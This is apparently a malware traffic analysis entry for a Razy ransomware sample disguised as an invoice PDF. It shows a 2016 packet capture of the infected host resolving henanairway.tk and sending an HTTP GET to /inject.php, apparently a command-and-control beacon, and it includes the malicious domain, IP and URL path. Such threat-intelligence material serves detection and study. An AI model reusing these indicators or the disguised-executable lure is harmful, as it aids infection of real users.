Razy/Ransomware Invoice20J-801265.pdf.exe Malware Traffic Analysis PCAP file download henanairway.tk

2016-09-08 04:30:30.266897 IP 192.168.56.14.51454 > 8.8.8.8.53: 37485+ A? www.henanairway.tk. (36)
E..@……1     ..8……..5.,.).m………..www.henanairway.tk…..
2016-09-08 04:30:30.295267 IP 8.8.8.8.53 > 192.168.56.14.51454: 37485 1/0/0 A 66.172.10.91 (52)
E..P1r..1.Oe……8..5…<.C.m………..www.henanairway.tk…………..+..B.
[
2016-09-08 04:30:30.376181 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [S], seq 4003209582, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….’..8.B.
[.l.P..!n…… .8……………
2016-09-08 04:30:30.533606 IP 66.172.10.91.80 > 192.168.56.14.49260: Flags [S.], seq 1998528983, ack 4003209583, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
EH.4..@./…B.
[..8..P.lw.!…!o..r.Mt…………..
2016-09-08 04:30:30.533788 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [.], ack 1, win 256, length 0
E..(..@….2..8.B.
[.l.P..!ow.!.P….V..
2016-09-08 04:30:30.557745 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [P.], seq 1:139, ack 1, win 256, length 138: HTTP: GET /inject.php?inject=3AsPWx5-cysNgg1tG-Y6&hm27mV7mPa8t(8jI3Q-0A00270F1AD9 HTTP/1.1
E…..@…….8.B.
[.l.P..!ow.!.P…….GET /inject.php?inject=3AsPWx5-cysNgg1tG-Y6&hm27mV7mPa8t(8jI3Q-0A00270F1AD9 HTTP/1.1
Host: www.henanairway.tk
Connection: Keep-Alive